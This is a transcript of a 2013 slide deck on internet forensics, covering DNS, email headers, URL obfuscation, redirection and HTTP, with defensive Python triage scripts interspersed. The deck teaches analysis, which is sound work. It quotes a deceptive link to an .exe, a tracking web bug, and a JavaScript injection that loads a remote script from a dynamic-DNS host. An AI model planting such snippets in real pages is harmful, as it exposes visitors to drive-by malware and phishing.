
Internet Forensics 101


An introductory walkthrough of the protocols that shape our web, and how their weaknesses influence the way we do business.

Benjamin Scott

July 25, 2013


Transcript

1. The Internet in brief
• Connecting to a remote computer requires its Internet Protocol address
  ◦ IPv4 - 66.228.49.238
  ◦ IPv6 - 2600:3c00::f03c:91ff:fedf:78db
• IANA gives blocks of IPs to Regional Internet Registries
  ◦ North America, South America, Asia-Pacific, Latin America, Africa
  ◦ RIRs give addresses to ISPs and hosting providers
• Early adopters have legacy allocations
  ◦ US Gov't / Military
  ◦ Universities
2. The Internet in brief (continued)
• Only 4.3 billion IPv4 addresses
  ◦ Many are reserved or in legacy space
• Network Address Translation (NAT)
  ◦ Share one public IP with many machines
  ◦ Requires hardware and logic in software
• CIDR notation
  ◦ 10.0.0.0/8 = all IP addresses beginning with 10
3. What's in a Name?
• Domain names map IP addresses to human-readable names for websites
  ◦ Easier to read and remember
  ◦ Allow for logical separation of sites
• Generic Top Level Domains
  ◦ .com .net .edu .info
• Country-specific TLDs
  ◦ .tv .ru .nl .us
• Vanity TLDs
  ◦ .canon .name .pants
4. Types of DNS Records
• Basically required
  ◦ A = IP version 4 address
  ◦ MX = Email server for domain
  ◦ NS = Name server
• Helpful to have
  ◦ AAAA = IP version 6 address
  ◦ PTR = Pointer to domain for an IP address
  ◦ SPF = Sender Policy for anti-spam
  ◦ SRV = Pointer to any service
  ◦ TXT = Arbitrary text
5. Resolving www.banana.com
1. Check hosts file (do we have the mapping hardcoded?)
2. Check local cache (have we seen this mapping in the past few minutes?)
3. Ask preferred DNS server (does Verizon know this mapping?)
4. DNS server goes up the food chain
   a. Asks root DNS server where to find '.com' NS
   b. Asks .com NS where to find 'banana.com' NS
   c. Asks banana.com NS where to find 'www'
   d. www.banana.com responds "authoritatively"
   e. DNS server responds with 69.164.205.196
6. Getting domain records
• On Windows:
  $ nslookup isightpartners.com 208.68.38.2
• On *nix:
  $ dig @ns1.google.com mail.google.com
  ;; ANSWER SECTION:
  mail.google.com.          604800  IN  CNAME  googlemail.l.google.com.
  googlemail.l.google.com.  300     IN  A      74.125.228.86
  googlemail.l.google.com.  300     IN  A      74.125.228.85
7. Common attacks on DNS
• DNS cache poisoning
  ◦ Forging responses to nameservers
  ◦ Requires guessing the Query ID
• Typo-squatting (whitehouse.com)
  ◦ Registering similar domains
• Transferring DNS records
  ◦ Social engineering the registrar
8. Whois data
• Shows who owns an Internet resource
• Can be fake or protected
• Stored with RIR or domain registrar
• On *nix:
  $ whois 64.4.11.37
  (from ARIN)
  NetRange: 64.4.0.0 - 64.4.63.255
  NetName: HOTMAIL
  Address: One Microsoft Way
  City: Redmond
9. Electronic Mail
• Simple Mail Transfer Protocol (SMTP)
  ◦ Headers: Recipient, Sender
  ◦ Body: Text, Attachments
• Mail Submission Agent (MSA)
  ◦ Listens on ports 587 and/or 25
  ◦ Accepts mail on behalf of users
• Mail Transfer Agent (MTA)
  ◦ Looks up MX record of recipient
10. Routing Headers
• "Received" headers log routing information
• Top line is the latest transaction
• Only trust your mailserver
• Example: sending from office to home email
  Received: by 10.4.18.32 (internal.google.com)
  Received: from mail.yourcompany.biz by mail.google.com with ESMTP id <stuff>
          Sun, 10 May 2013 12:84:29 -0400 (EDT)
11. Address Headers
• From: "James Handsome" <[email protected]>
• Return-Path: [email protected]
• Message-ID: <[email protected]>
• Optional header lines start with "X-"
  ◦ X-Accept-Language: en-us, zh-cn
  ◦ X-Spam-Score: 70
  ◦ X-Mailer: The Bat! 2.1
  ◦ X-Originating-IP: 72.5.9.4
12. Content Headers
• Message body is included after the content definition
  Subject: Party Invite
  Content-Type: text/plain;
  Content-Transfer-Encoding: 7bit

  See you at 10!

  Content-Type: text/html;

  <html> <blink> Sweet </blink>
13. Attachments
• Non-text data can be sent via SMTP
• Multipurpose Internet Mail Extensions (MIME)
  MIME-Version: 1.0
  Content-Type: multipart/mixed; boundary=video_games
  [...text attachment...]
  --video_games
  Content-Type: application/octet-stream; name="agenda.pdf"
  Content-Transfer-Encoding: base64
  Content-Disposition: attachment; filename="agenda.pdf"
  JVBERiBibGFoIGJsYWggYmxhaA==
  --video_games--
• Slide callouts: attachment filename, base-64 encoded PDF, MIME boundary tag
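The analyst's counterpart to slide 13 is to decode every attachment and check that the bytes match the claimed filename. This is an added example (not code from the deck); the message below is constructed from the slide's own headers and base64 sample, and the magic-byte table is an assumption limited to three common types.

```python
import email
from email import policy

# Constructed message modelled on the deck's slide 13 (not a real capture).
RAW_MESSAGE = """\
From: "James Handsome" <sender@example.test>
Subject: Party Invite
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary=video_games

--video_games
Content-Type: text/plain

See you at 10!
--video_games
Content-Type: application/octet-stream; name="agenda.pdf"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="agenda.pdf"

JVBERiBibGFoIGJsYWggYmxhaA==
--video_games--
"""

# Leading bytes of common attachment types and the extensions they legitimately carry.
MAGIC = [
    (b"%PDF", "pdf", {"pdf"}),
    (b"MZ", "windows executable", {"exe", "dll", "scr"}),
    (b"PK\x03\x04", "zip container", {"zip", "docx", "xlsx", "jar"}),
]

def sniff(data):
    """Type implied by the decoded bytes, regardless of the claimed filename."""
    for magic, label, exts in MAGIC:
        if data.startswith(magic):
            return label, exts
    return "unknown", set()
def extract_attachments(raw):
    """Walk every MIME part, decode each attachment, compare extension with content."""
    msg = email.message_from_string(raw, policy=policy.default)
    found = []
    for part in msg.walk():
        name = part.get_filename()
        if part.get_content_maintype() == "multipart" or not name:
            continue
        data = part.get_payload(decode=True)   # undoes base64 / quoted-printable
        label, exts = sniff(data)
        ext = name.rsplit(".", 1)[-1].lower()
        found.append({"filename": name, "size": len(data), "type": label,
                      "mismatch": bool(exts) and ext not in exts})
    return found
```

The slide's base64 string decodes to 19 bytes beginning with `%PDF`, so the claimed `.pdf` extension is consistent; an `MZ` header behind a `.pdf` name would set `mismatch`.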
14. HTML Body Text
• Allows for rich content: colors, images, links
• Issue: Malicious links
  ◦ Display text differs from actual destination
  ◦ <a href="http://evil.ru/a.exe">Payment Notification</a>
• Issue: Web bugs
  ◦ Load invisible images to track receipt time and IP
  ◦ <img src="http://ad.shady.net/track.gif">
15. Attacks on Email
• Spoofed sender
  ◦ 'From' and 'Return-Path' different than real sender
• Forged headers
  ◦ Mis-matched sender name and IP address
  ◦ Received: from legit.gov (spammer.com [81.95.144.7])
  ◦ 'X-Spam-Filtered' lines added by spammer
• Phishing
  ◦ Email from a compromised or spoofed sender with enticing theme and malicious contents
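The three header checks from slides 10, 11 and 15 (HELO name vs. reverse DNS in `Received`, `From` vs. `Return-Path`, and sender-supplied `X-Spam-*` lines) as a small triage script. This is an added example, not part of the deck; the headers are constructed from the slides' samples, and the `Received` regex assumes the common `from HELO (rdns [ip])` layout.

```python
import re
import email

# Constructed headers modelled on the deck's slides 10 and 15 (not a real capture).
RAW_HEADERS = """\
Received: by 10.4.18.32 (internal.google.com)
Received: from legit.gov (spammer.com [81.95.144.7])
        by mail.google.com with ESMTP id abc123; Sun, 10 May 2013 12:34:29 -0400
From: "James Handsome" <ceo@legit.gov>
Return-Path: <bounce@spammer.com>
X-Spam-Filtered: clean
Subject: Payment Notification

"""

# "from HELO (reverse-dns [ip])": what the sender claimed vs. what the receiving MTA saw.
RECEIVED_RE = re.compile(r"from\s+(\S+)\s+\((\S+)\s+\[([\d.]+)\]\)")

def domain_of(addr):
    """Bare domain of an address like '"Name" <user@host>'."""
    return addr.split("@")[-1].strip("<> ").lower()

def analyse(raw):
    msg = email.message_from_string(raw)
    findings = []
    # Received headers: the top one is the last hop, so we walk newest first.
    for hop in msg.get_all("Received", []):
        m = RECEIVED_RE.search(hop)
        if not m:
            continue
        claimed, rdns, ip = m.groups()
        if claimed.lower() != rdns.lower():
            findings.append(f"forged HELO: claims {claimed} but is {rdns} [{ip}]")
    from_dom = domain_of(msg.get("From", ""))
    rp_dom = domain_of(msg.get("Return-Path", ""))
    if from_dom and rp_dom and from_dom != rp_dom:
        findings.append(f"spoofed sender: From {from_dom} vs Return-Path {rp_dom}")
    if msg.get("X-Spam-Filtered"):
        findings.append("X-Spam-Filtered present: written by the sender, not a trust signal")
    return findings
```

Only hops added by your own mail servers are trustworthy; anything below them in the chain can be fabricated by the sender.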
16. URL Obfuscation
• Based on social-engineering
  ◦ https://intrasight.isightpartners.int/malcode/URL_Obfuscation
  ◦ http://www.isightpartners.com
  ◦ http://%77%77%77%2e%69%73%69%67%68%74%70%61%72%74%6e%65%72%73%2e%63%6f%6d
  ◦ http://[email protected]
  ◦ google
  ◦ http://208.68.38.2
  ◦ http://3494127106
  ◦ 208(256^3) + 68(256^2) + 38(256^1) + 2(256^0) = 3494127106
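Slide 16's forms (percent-encoded hostname, `user@host` userinfo trick, bare decimal IP) all resolve to the same place, and the arithmetic on the slide is exactly the decimal-IP conversion. This added example (not the deck's code) normalises each form to the real destination host; the sample URLs are constructed from the slide, with the userinfo example spelled out as `www.isightpartners.com@208.68.38.2` as an assumption.

```python
import ipaddress
from urllib.parse import unquote, urlsplit

# Constructed inputs reproducing the forms on the deck's slide 16.
SAMPLES = [
    "http://%77%77%77%2e%69%73%69%67%68%74%70%61%72%74%6e%65%72%73%2e%63%6f%6d",
    "http://www.isightpartners.com@208.68.38.2",   # assumed expansion of the slide's user@host form
    "http://3494127106",
    "http://208.68.38.2",
]

def dotted_to_int(dotted):
    """208.68.38.2 -> 208*256^3 + 68*256^2 + 38*256 + 2 = 3494127106 (the slide's sum)."""
    octets = [int(o) for o in dotted.split(".")]
    return int.from_bytes(bytes(octets), "big")

def normalise_host(netloc):
    """Undo the tricks a browser silently accepts: percent-encoding,
    a user@ prefix, and a bare integer standing in for a dotted quad."""
    netloc = unquote(netloc)
    if "@" in netloc:          # everything before the last '@' is userinfo, not the host
        netloc = netloc.rsplit("@", 1)[1]
    if netloc.isdigit():       # 3494127106 -> 208.68.38.2
        netloc = str(ipaddress.IPv4Address(int(netloc)))
    return netloc.lower()

def real_destination(url):
    """Host the browser will actually connect to for this URL."""
    return normalise_host(urlsplit(url).netloc)
```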
17. Related Domain Names
• Based on social-engineering
  ◦ citbank.com
  ◦ bankofamericaportal.com
  ◦ hxxp://webmail.hbo.com.s-thrones.co[.]ru
• Dynamic DNS
  ◦ Hostnames are independent of each other since arbitrary people can request an entry
  ◦ Some providers allow client-side software that will change the DNS entry based on the IP address of the client
  ◦ palderson.findme.com
  ◦ dol.ns01.us
  ◦ microsoft.ns01.us
18. Redirection
• Page-based
  ◦ <meta http-equiv="refresh" content="N; URL=other-web-address">
• Example
  <html><head>
  <meta http-equiv="refresh" content="2; URL=http://www.isightpartners.com">
  </head></html>
19. Redirection
• Standard HTTP header
  HTTP/1.1 200 OK
  Content-Type: text/html
  Content-Length: 78
• For non-200 messages: instead of a web page being returned, just an HTTP code is returned.
20. Server-based Redirection
• 301 - Moved permanently
• 302 - Temporary redirect
• 303 - "Operation has completed, continue here..."
• 307 - Temporary redirect (Does anyone use this?)
21. Redirection
• Normal javascript
  <html>
  <head>
  <!-- BEGIN JavaScript -->
  <script src="//ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
  <script src="//webapps.dol.gov/FSPublic/Scripts/W_Helpful.js"></script>
  <script src="//s7.addthis.com/js/300/addthis_widget.js#pubid=usdol"></script>
  <script src="/scripts/main.js"></script>
  <script src="/scripts/dol.plugins.js"></script>
  <link href="//webapps.dol.gov/FSPublic/Content/W_Helpful.css" rel="stylesheet">
  <!-- END JavaScript -->
  </head>
  <body>
  ...
22. Redirection
• Redirection and/or includes via javascript
  ◦ h=document.createElement('script');
  ◦ h.src='http://dol.ns01.us:8081/web/xss.php';
  ◦ document.getElementsByTagName('head')[0].appendChild(h);
• Dynamically adds new javascript to the page
• No new files on infected web server
• Small modification to existing javascript
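The page features from slides 14, 18, 21 and 22 (meta refresh, third-party script sources, links to executables, tracking images, and a `.src=` assignment buried in inline script) can be pulled out of a captured page with the standard-library HTML parser. This is an added example rather than the deck's code; the sample page is constructed from the slides' snippets, and `www.dol.gov` is assumed as the site's own host.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit
# Constructed page combining the patterns on the deck's slides 14, 18, 21 and 22.
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh" content="2; URL=http://www.isightpartners.com">
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
<script src="/scripts/main.js"></script>
<script>h=document.createElement('script');
h.src='http://dol.ns01.us:8081/web/xss.php';
document.getElementsByTagName('head')[0].appendChild(h);</script>
</head><body>
<a href="http://evil.ru/a.exe">Payment Notification</a>
<img src="http://ad.shady.net/track.gif" width="1" height="1">
</body></html>"""
# Assignments like h.src='...' inside inline scripts (the slide 22 injection pattern).
SRC_IN_JS = re.compile(r"""\.src\s*=\s*['"]([^'"]+)['"]""")

def host(url):
    # Hostname of an absolute or protocol-relative URL; '' for same-origin paths.
    return (urlsplit(url if "//" in url else "//" + url).hostname or "").lower()

class Triage(HTMLParser):
    """Collect what an analyst checks first: redirects, script origins,
    links to executables and third-party tracking images."""
    def __init__(self, own_host):
        super().__init__()
        self.own_host, self.findings, self.in_script = own_host, [], False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            self.findings.append(("meta-refresh", a.get("content") or ""))
        elif tag == "script":
            self.in_script = True
            h = host(a.get("src") or "")
            if h and h != self.own_host:
                self.findings.append(("external-script", h))
        elif tag == "a" and (a.get("href") or "").lower().endswith((".exe", ".scr")):
            self.findings.append(("executable-link", a["href"]))
        elif tag == "img" and host(a.get("src") or "") not in ("", self.own_host):
            self.findings.append(("web-bug", a["src"]))
    def handle_endtag(self, tag):
        self.in_script = self.in_script and tag != "script"
    def handle_data(self, data):          # script bodies arrive here as raw text
        if self.in_script:
            for url in SRC_IN_JS.findall(data):
                self.findings.append(("dynamic-script", host(url)))

def triage(html_text, own_host):
    parser = Triage(own_host)
    parser.feed(html_text)
    return parser.findings
```

Same-origin script paths such as `/scripts/main.js` are not reported; the dynamically added `dol.ns01.us` source is, even though it never appears in a `<script src>` attribute.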
23. Agenda
• Chapter 5
  ◦ What is HTML
  ◦ Capturing web-pages
  ◦ Archiving / spidering
  ◦ Drive-by
  ◦ Dynamic web content
  ◦ Validation and web-application issues
24. View HTML Source
• HTML is simply text
• After visiting site:
  ◦ Ctrl + U
  ◦ or via menu
• Directly view source without displaying page
  ◦ view-source:http://www.isightpartners.com/
• Source can reveal page creation software
  ◦ Meta-tags
  ◦ Comments
  ◦ Names within the elements (forms, javascript functions, etc)
  ◦ Directory names
25. Capturing Web Pages
• Why are we capturing?
  ◦ Forensics copy for legal reasons
  ◦ Determine maliciousness
  ◦ Find vulnerabilities
  ◦ Read the page later
• Firefox - Save Web Page, Complete
  ◦ Rearranges parts of the web page
• Internet Explorer - Save Webpage, Complete
  ◦ Adds comments
• wget
• wget -p
26. Spidering
• Visit a web site, visit all the links, save the data.
• WayBackMachine
  ◦ http://web.archive.org
• Google cache
• wget -m
• curl
• HTTrack
• w3af - webSpider
• Burp
27. Controlling archiving
• robots.txt
  ◦ Directives to restrict well-behaved spidering and archiving.
  User-agent: *
  Disallow: /sde/
  Disallow: /Portal/
  Disallow: /mrtg/
  Disallow: /Connections/
  Disallow: /css/
  Disallow: /includes/
  Disallow: /Scripts/
  Disallow: /sip/
  Disallow: /temp/
  Allow: /
28. Drive-by
• Visiting a website to determine if it is evil.
• Burp
  ◦ web proxy
  ◦ captures and intercepts/manipulates traffic
  ◦ spider
  ◦ brute-forcer
  ◦ repeater
  ◦ comparer
29. Dynamic Web Pages
• Traditional (or static) server
  ◦ Files are read from disk and delivered unchanged to the client
• Dynamic server
  ◦ Program or script is run that creates the content on-demand
  ◦ Database queries
  ◦ Remote retrieval
  ◦ Deliver content based on meta data of the client
    ▪ IP
    ▪ Referral fields
    ▪ User-Agent
30. Dynamic Web Pages
• Client side
  ◦ Javascript
  ◦ Java
  ◦ Flash
• Server side
  ◦ PHP
  ◦ Perl
  ◦ ASP
  ◦ JSP
  ◦ CGI
31. Pitfalls of dynamic content
• Client-side validation
  ◦ Faster, more responsive
  ◦ Less bandwidth
  ◦ Lightens server load
  ◦ Not a substitute for server-side validation
• Server-side validation
  ◦ Generally more secure
  ◦ Doesn't expose data or logic to the client
32. HTTP: Data transfer of the future
• Hypertext Transfer Protocol is great!
  ◦ Extensible for any content
  ◦ Widely supported and mature protocol
  ◦ Persistent connections in HTTP 1.1
• Also it has issues!
  ◦ Must accept a wide range of inputs
  ◦ Lack of session management
33. HTTP Servers
• Give local files to remote clients
• Browser: Hi twitter.com! Please give me the resource at /NorthernlionLP. Also he's the best.
• Server: Cool, here's that page, and I ignored that 'best' GET variable, IDK what it means.
• http://twitter.com/NorthernlionLP?best=yes
34. What the Client Sends
• (Request-URI): How data will be sent and the resource name
• Host: Destination domain
• Referer: Originating page for request
• User-Agent: Client version and compatibility
• Accept-Language: English, you speak it?
  GET /highscores.html HTTP/1.1
  Host: competitive-eating.biz
  Referer: google.com/search/q?sandwiches
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/26.0.1410.64 Safari/537.31
  Accept-Language: en-us
35. Other Client Requests
• GET: Get a page, with variables in URI
• POST: Send data directly to site with same URI
• PUT: Create a resource [usually ignored]
• CONNECT: Get page on my behalf
• Optional client headers
  ◦ X-Forwarded-For: 73.5.1.2 (proxy logs)
  ◦ DNT: 1 (please don't track me)
36. The Server's Response
• (Response Code): Page exists, has moved, or is gone
• Location: Full URI for page
• Server: Server version and installed modules
• Content-Type: MIME format of the response
• Last-Modified: Whether page should be refreshed from cache
  HTTP/1.1 200 OK
  Location: http://competitive-eating.biz/highscores.html
  Server: Nginx/1.41
  Content-Type: text/html
  Last-Modified: Fri, 10 May 2013 02:01:13 GMT

  <HTML> <title>ALL TIME CHAMPIONS</title> </HTML>
37. Other Server Responses
• 200: Got your page right here
• 302: Your page moved over there
• 404: There never was a page, man
• 502: Server crashed
• Optional headers
  ◦ X-XSS-Protection: 1
  ◦ X-Powered-By: PHP
38. Cookies
• Files written to client
• Persistent until they expire or are deleted
• Set using Set-Cookie or scripts
  user=couch,scotch=macallan; expires=Sat,16-May-2013; path=/; domain=.amazon.com
• i.e. this cookie denotes that I'm Couch and my purchase info. It can only be read by Amazon.
39. Server-side Scripting
• Creates pages on demand
• Formats for different browsers
• Common modules
  ◦ CGI scripts {PHP, ColdFusion, Python}
  ◦ Embedded interpreters {Ruby, JavaScript}
• Slide diagram: Client request -> Server -> Module -> DB (query / write) -> <HTML> served back to the client
40. Proxies
• Route HTTP traffic through another machine
• Non-anonymous: add X-Forwarded-For: $your_ip
• The Onion Router (TOR)
  ◦ Encrypts data within "Relay nodes"
  ◦ "Exit nodes" connect to destination site.com
• Slide diagram: Client --HTTP CONNECT site.com--> Proxy --HTTP GET site.com--> site.com